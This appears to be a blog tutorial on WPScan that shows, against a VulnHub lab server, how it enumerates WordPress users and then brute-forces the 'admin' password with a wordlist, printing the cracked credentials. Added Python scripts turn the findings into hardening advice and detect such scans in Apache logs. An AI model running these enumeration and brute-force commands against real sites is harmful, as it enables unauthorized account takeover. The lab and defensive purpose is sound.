[Tools] WP-Scan

g2h, 2023. 10. 1. 23:03

Introduction

WPScan is an open-source tool that scans websites running WordPress for security vulnerabilities and analyzes their security configuration.

WordPress is currently the most popular CMS in the world. As of this writing, its market share is 64.3%, a dominant position that amounts to a near-monopoly.

Installation

sudo apt install wpscan

Basic usage

The basic command for scanning a website running WordPress is as follows.

wpscan --url http://target.com

Main options

Each option can also be written in abbreviated form, e.g. --enumerate-u → -e u

Option                  Description

--url                   URL of the target website
--enumerate             Enumerate themes, plugins, users, etc.
--plugins-detection     Plugin detection option
--themes-detection      Theme detection option
--wp-version            WordPress version detection option
--enumerate-vul         Check for and enumerate vulnerabilities
--enumerate-p           Enumerate plugin-related information
--enumerate-t           Enumerate theme-related information
--enumerate-u           Enumerate user-related information
--enumerate-s           Enumerate search-engine directories and files
--follow-redirection    Follow redirections
--proxy                 Set a proxy server

Example

“This demonstration was performed against a server provided by VulnHub.”

______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL:  [172.30.1.15]
[+] Started: Wed Sep 20 23:26:50 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
 | Found By: Emoji Settings (Passive Detection)
 |  - , Match: '-release.min.js?ver=4.9.23'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - , Match: 'WordPress 4.9.23'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Sep 20 23:26:51 2023
[+] Requests Done: 24
[+] Cached Requests: 29
[+] Data Sent: 6.362 KB
[+] Data Received: 122.319 KB
[+] Memory used: 155.508 MB
[+] Elapsed time: 00:00:00

We can see that an account named admin exists, and by running a brute-force attack against it we can recover the password.
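Before moving on to the password attack, it is worth seeing how the report above reads from the site owner's side. The following Python script is an added example (not code from WPScan or from the original post): it parses a WPScan text report of the shape shown above into structured findings and maps each finding to a hardening action. The embedded report is a constructed excerpt (sample host 192.0.2.10, shortened from the scan output above), and the remediation wording is this example's own, not WPScan's.

```python
"""Turn a WPScan text report into structured findings and a hardening checklist.

Added example, not code from WPScan or the original post. The report below is
a constructed excerpt (sample host 192.0.2.10) shortened from the output above.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_REPORT = """\
[+] URL: http://192.0.2.10/ [192.0.2.10]

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.0.2.10/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

[+] WordPress readme found: http://192.0.2.10/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.0.2.10/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.0.2.10/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%

[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
 | Found By: Emoji Settings (Passive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
"""

@dataclass
class Finding:
    title: str
    found_by: str = ""
    confidence: int = 0
    references: List[str] = field(default_factory=list)

HEADER_RE = re.compile(r"^\[[+i!]\] (.+)$")          # "[+] title" / "[i] title"
ATTR_RE = re.compile(r"^ \| ([A-Za-z ]+): (.+)$")     # " | Found By: ..."
REF_RE = re.compile(r"^ \|  - (https?://[^\s,]+)")    # " |  - http://..."

def parse_report(text: str) -> List[Finding]:
    """Keep every '[+]'/'[i]' block that carries ' | ' detail lines."""
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = Finding(title=m.group(1).strip())
            continue
        if current is None:
            continue
        m = ATTR_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "Found By":
                current.found_by = value
            elif key == "Confidence":
                current.confidence = int(value.rstrip("%"))
            if not findings or findings[-1] is not current:
                findings.append(current)  # bookkeeping lines without details are dropped
            continue
        m = REF_RE.match(line)
        if m:
            current.references.append(m.group(1))
    return findings

# Hardening advice keyed by finding-title prefix; the wording is this example's, not WPScan's.
REMEDIATION = [
    ("Headers", "Hide the Server version banner (Apache: ServerTokens Prod)."),
    ("XML-RPC seems to be enabled", "Disable xmlrpc.php unless a client needs it "
     "(system.multicall login guessing, pingback abuse)."),
    ("WordPress readme found", "Remove or block readme.html; it discloses the version."),
    ("Upload directory has listing enabled", "Disable directory indexes (Options -Indexes)."),
    ("The external WP-Cron seems to be enabled", "Set DISABLE_WP_CRON and schedule wp-cron.php from the OS."),
]

def remediation_for(f: Finding) -> Optional[str]:
    if f.title.startswith("WordPress version"):
        return "Update WordPress to the current release." if "Outdated" in f.title else None
    if "Author Id Brute Forcing" in f.found_by or "Login Error" in f.found_by:
        return (f"User '{f.title}' is enumerable: stop ?author=N redirects, use generic "
                "login errors, and require strong passwords plus MFA.")
    return next((advice for prefix, advice in REMEDIATION if f.title.startswith(prefix)), None)

def identified_users(findings: List[Finding]) -> List[str]:
    return [f.title for f in findings if "Author Id Brute Forcing" in f.found_by]

def checklist(findings: List[Finding]):
    """(title, confidence, advice) for every finding that has a hardening action."""
    return [(f.title, f.confidence, a) for f in findings if (a := remediation_for(f))]
```

A block is kept only if it has at least one ` | ` detail line, which is what separates real findings from the URL/timing bookkeeping lines; the confidence value is carried through so that a 60% finding such as the external WP-Cron check can be triaged differently from a 100% one.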

wpscan --url http://172.30.1.15/secret --usernames admin --passwords /usr/share/wordlists/metasploit/http_default_pass.txt --max-threads 20

[+] URL:  [172.30.1.15]
[+] Started: Wed Sep 20 23:33:11 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
 | Found By: Emoji Settings (Passive Detection)
 |  - , Match: '-release.min.js?ver=4.9.23'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - , Match: 'WordPress 4.9.23'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin                                                                                                                                                
Trying admin / turnkey Time: 00:00:00 <================================================                                                 > (19 / 38) 50.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Sep 20 23:33:15 2023
[+] Requests Done: 159
[+] Cached Requests: 30
[+] Data Sent: 43.075 KB
[+] Data Received: 86.61 KB
[+] Memory used: 207.621 MB
[+] Elapsed time: 00:00:04

We can confirm that the password was obtained as well.
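The two runs above leave a distinctive trail in the web server's access log: ten `?author=N` probes during user enumeration, then a burst of POST requests to wp-login.php during the password attack. The following Python script is an added example (not code from WPScan or from the original post) that runs simple detection rules over Apache combined-format log lines. The log lines, IP addresses, timestamps and the WPScan user-agent string in the sample are all constructed, and the thresholds are assumptions to be tuned per site. The user-agent rule is deliberately treated as a weak signal, since WPScan's `--random-user-agent` option replaces it; the behavioural rules carry the weight.

```python
"""Spot WPScan-style user enumeration and wp-login.php brute force in Apache logs.

Added example, not code from WPScan or the original post. The log lines are
constructed (scanner IP 198.51.100.7, visitor IP 203.0.113.5, sample user
agents) to mirror what the scans above produce on the server side.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def _line(ip: str, ts: str, req: str, status: int, ua: str) -> str:
    """Build one constructed Apache combined-format line."""
    return f'{ip} - - [{ts}] "{req} HTTP/1.1" {status} 512 "-" "{ua}"'

SCANNER_UA = "WPScan v3.8.24 (constructed sample UA)"
BROWSER_UA = "Mozilla/5.0 (constructed sample UA)"
SAMPLE_LOG = (
    # author-ID probing: WordPress answers ?author=N with a 301 to /author/<login>/
    [_line("198.51.100.7", f"20/Sep/2023:23:26:5{i} +0900", f"GET /?author={i + 1}", 301, SCANNER_UA)
     for i in range(10)]
    # one ordinary visitor in between
    + [_line("203.0.113.5", "20/Sep/2023:23:30:00 +0900", "GET /index.php", 200, BROWSER_UA)]
    # 19 failed logins (WordPress re-renders the form with 200) and a final 302 (login succeeded)
    + [_line("198.51.100.7", f"20/Sep/2023:23:33:{11 + i:02d} +0900", "POST /wp-login.php",
             302 if i == 19 else 200, SCANNER_UA) for i in range(20)]
)

def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def max_in_window(times: List[datetime], window_s: int) -> int:
    """Largest number of events falling inside any window_s-second span."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while (t - times[lo]).total_seconds() > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best

def detect(lines: List[str], author_threshold: int = 5, login_threshold: int = 10,
           window_s: int = 60) -> List[Dict]:
    """Thresholds are assumptions to tune per site; returns one alert per (ip, rule)."""
    authors: Dict[str, set] = defaultdict(set)
    logins: Dict[str, list] = defaultdict(list)
    redirects: Dict[str, int] = defaultdict(int)
    ua_hits = set()
    for e in filter(None, map(parse_line, lines)):
        if "WPScan" in e["ua"]:  # weak signal: --random-user-agent replaces it
            ua_hits.add(e["ip"])
        m = re.search(r"[?&]author=(\d+)", e["path"])
        if m and e["method"] == "GET":
            authors[e["ip"]].add(m.group(1))
        if e["method"] == "POST" and e["path"].startswith("/wp-login.php"):
            logins[e["ip"]].append(e["ts"])
            if e["status"] == 302:
                redirects[e["ip"]] += 1
    alerts = [{"ip": ip, "rule": "wpscan-user-agent"} for ip in sorted(ua_hits)]
    for ip, ids in authors.items():
        if len(ids) >= author_threshold:
            alerts.append({"ip": ip, "rule": "author-id-enumeration", "count": len(ids)})
    for ip, ts in logins.items():
        burst = max_in_window(ts, window_s)
        if burst >= login_threshold:
            alerts.append({"ip": ip, "rule": "wp-login-brute-force", "count": burst,
                           "possible_success": redirects[ip] > 0})
    return alerts
```

The brute-force rule counts distinct POSTs to wp-login.php inside a sliding 60-second window rather than over the whole file, so a site with many legitimate logins per day is not flagged, while a 20-request burst like the one above is. A 302 following a run of 200s is reported as `possible_success`, which is the case that warrants an immediate password reset for the account involved.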

※ If anything here is incorrect or problematic, or if the explanation is lacking, please let me know.
